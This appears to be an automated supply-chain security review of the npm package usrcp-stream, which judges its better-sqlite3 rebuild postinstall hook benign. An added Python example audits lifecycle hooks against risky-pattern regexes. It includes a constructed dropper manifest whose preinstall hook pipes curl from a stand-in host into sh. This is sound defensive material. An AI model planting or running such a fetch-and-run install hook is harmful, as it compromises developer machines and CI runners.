AI Security Review
scanned 3d ago · by lpm-firewall-ai
No confirmed malicious attack surface was found. Risky behavior is package-aligned: a native dependency rebuild at install, user-invoked MCP/CLI capture, opt-in embeddings, and user-specified cloud sync.
Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install for rebuild; user runs usrcp-stream init/serve/sync for runtime features
Impact
Stores user-provided conversation events locally and can sync encrypted events or request embeddings when explicitly configured
Mechanism
declared encrypted local memory and sync tooling
Rationale
Static inspection shows declared CLI/MCP functionality for encrypted conversation capture, embeddings, and optional sync; suspicious primitives are user-invoked or install-time dependency maintenance rather than covert collection or exfiltration. The postinstall hook is undesirable but narrowly scoped to rebuilding better-sqlite3 and does not establish malicious intent by itself.
Evidence
- package.json
- README.md
- dist/index.js
- dist/sync.js
- dist/config-io.js
- dist/embeddings/openai.js
- dist/embeddings/voyage.js
- dist/embeddings/ollama.js
- dist/capture/ingest.js
- node_modules/better-sqlite3/build
- node_modules/usrcp-core/node_modules/better-sqlite3/build
- node_modules/usrcp-stream/node_modules/better-sqlite3/build
- stream-config.toml
- stream.db
Network endpoints (5)
- localhost:11434
- api.openai.com/v1/embeddings
- api.voyageai.com/v1/embeddings
- /v1/stream/push
- /v1/stream/pull
Decision evidence
public snapshot: AI called this Clean at 86.0% confidence as Benign with medium false-positive risk.
Evidence for block
- package.json has postinstall deleting better-sqlite3 build dirs and running npm rebuild better-sqlite3
- dist/sync.js can push encrypted local stream events to a user-supplied --endpoint
- dist/embeddings/openai.js and voyage.js send conversation text in plaintext to the vendor embedding APIs once a provider is explicitly configured; the local at-rest encryption does not cover what those vendors receive
Evidence against
- dist/index.js commands are CLI-invoked; import only dispatches CLI main, no hidden payload beyond declared bin behavior
- postinstall is narrow to better-sqlite3 build folders for native rebuild, not credential/file harvesting or persistence
- dist/config-io.js stores vendor API key inside encrypted stream-config.toml
- README.md documents local encrypted capture, opt-in vendor embedding providers, and explicit cloud sync endpoints
- rg found no child_process, eval, Function, native payload loading, prompt injection, or AI-agent control-surface writes in dist
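The Critical and High findings on this page both come down to one check: does package.json declare an install-time lifecycle hook, and if so, is it narrowly scoped to a native rebuild or does it reach further? The script below is an added example of that static gate, written for this page and not code from lpm-firewall-ai or from the usrcp-stream package. Both manifests in it are constructed: the first approximates the shape of the flagged postinstall (a `node -e` one-liner that removes better-sqlite3 build directories and then runs `npm rebuild`; the real script is truncated on the page, so this is not a copy), the second is a hook that should be blocked outright. Hook names, pattern list, and the `node_modules/**/build` scope rule are the example's own choices.

```python
"""Audit the lifecycle scripts of an npm package.json before `npm install`.

Added example; not code from the scanner or from the usrcp-stream package.
Both manifests below are constructed for the demo. The exact postinstall on
the page is truncated, so NATIVE_REBUILD_PKG approximates its shape only.
"""
import json
import re

# Hooks npm runs automatically; each one executes arbitrary code on the
# developer machine or CI runner as soon as the package is installed.
LIFECYCLE_HOOKS = (
    "preinstall", "install", "postinstall",
    "prepare", "prepublish", "prepublishOnly", "prepack", "postpack",
)

# (regex, severity, note): primitives that warrant a human look in an install hook.
RISKY_PATTERNS = [
    (r"\bnode\s+-e\b", "high", "inline JavaScript executed at install time"),
    (r"\b(curl|wget)\b", "high", "fetches content at install time"),
    (r"\|\s*(ba)?sh\b", "high", "pipes output into a shell"),
    (r"child_process|\bexec(Sync)?\(|\bspawn(Sync)?\(", "high", "spawns processes from script body"),
    (r"\beval\(|new Function\(", "high", "dynamic code evaluation"),
    (r"base64|fromCharCode", "medium", "possible encoded payload"),
    (r"rm\s+-rf|rmSync|rmdirSync", "medium", "deletes files"),
    (r"\bnpm\s+rebuild\b|node-gyp\s+rebuild", "low", "native addon rebuild"),
]

# The only filesystem scope a native-rebuild hook legitimately needs (assumption).
ALLOWED_PATH = re.compile(r"node_modules/[^\"' ]*/build/?")


def lifecycle_scripts(pkg: dict) -> dict:
    """Return {hook: command} for every lifecycle hook the manifest declares."""
    return {k: v for k, v in (pkg.get("scripts") or {}).items() if k in LIFECYCLE_HOOKS}


def audit_script(command: str) -> dict:
    """Static gate for one script body: pattern hits, path scope, verdict."""
    hits = [(sev, note) for rx, sev, note in RISKY_PATTERNS if re.search(rx, command)]
    # Quoted tokens containing a slash are treated as filesystem paths.
    paths = re.findall(r"[\"']([^\"']*/[^\"']*)[\"']", command)
    out_of_scope = [p for p in paths if not ALLOWED_PATH.fullmatch(p)]
    high = any(sev == "high" for sev, _ in hits)
    if not hits:
        verdict = "allow"
    elif out_of_scope:
        verdict = "block"    # touches paths outside node_modules/**/build
    elif high and paths:
        verdict = "review"   # risky primitive, but every path stays under node_modules/**/build
    elif high:
        verdict = "block"    # risky primitive with no visible, bounded scope
    else:
        verdict = "review"
    return {"verdict": verdict, "hits": hits, "paths": paths, "out_of_scope": out_of_scope}


def audit_package(pkg_json: str) -> dict:
    """Audit every lifecycle hook; the overall verdict is the worst hook verdict."""
    pkg = json.loads(pkg_json)
    results = {hook: audit_script(cmd) for hook, cmd in lifecycle_scripts(pkg).items()}
    rank = {"allow": 0, "review": 1, "block": 2}
    overall = max((r["verdict"] for r in results.values()), key=rank.get, default="allow")
    return {"name": pkg.get("name"), "overall": overall, "hooks": results}


# Constructed manifest approximating the flagged postinstall (not the real one).
NATIVE_REBUILD_PKG = json.dumps({
    "name": "example-native-dep",
    "scripts": {
        "postinstall": (
            "node -e \"const fs=require('fs');"
            "for(const p of ['node_modules/better-sqlite3/build',"
            "'node_modules/example-core/node_modules/better-sqlite3/build'])"
            "fs.rmSync(p,{recursive:true,force:true})\" && npm rebuild better-sqlite3"
        ),
        "test": "node test.js",
    },
})

# Constructed manifest with a hook that must be blocked outright.
DOWNLOADER_PKG = json.dumps({
    "name": "example-dropper",
    "scripts": {"preinstall": "curl -s https://example.invalid/x.sh | sh"},
})

if __name__ == "__main__":
    for manifest in (NATIVE_REBUILD_PKG, DOWNLOADER_PKG):
        report = audit_package(manifest)
        print(report["name"], "->", report["overall"])
        for hook, r in report["hooks"].items():
            notes = [n for _, n in r["hits"]]
            print(f"  {hook}: {r['verdict']}, hits={notes}, out_of_scope={r['out_of_scope']}")
```

The two-stage result mirrors the page: the deterministic gate fires on `node -e` in an install hook, and the scope check is what keeps a rebuild-only hook at "review" instead of "block". When you do decide to install such a package, `npm install --ignore-scripts` followed by an explicit `npm rebuild better-sqlite3` gives the same native build without letting the package's own hook run.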
Behavioral surface
ChildProcess · Crypto · EnvironmentVars · Filesystem · Network · HighEntropyStrings · UrlStrings
Source & flagged code
2 flagged · package.json
• scripts.postinstall = node -e "const fs=require(\"fs\"); for (const p of [\"node_modules/better-sqlite3/build\",\"node_modules/usrcp-core/node_modules/better-sqlite3/build\",\"node_modules/usrcp-stream/...
Critical
Red Install Lifecycle Script
Install-time lifecycle script matches a deterministic static-gate block pattern.
package.json · scripts.postinstall (snippet above)
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.json
Findings
1 Critical · 1 High · 2 Medium · 4 Low
Critical: Red Install Lifecycle Script (package.json)
High: Install Time Lifecycle Scripts (package.json)
Medium: Network
Medium: Environment Vars
Low: Scripts Present
Low: Filesystem
Low: High Entropy Strings
Low: Url Strings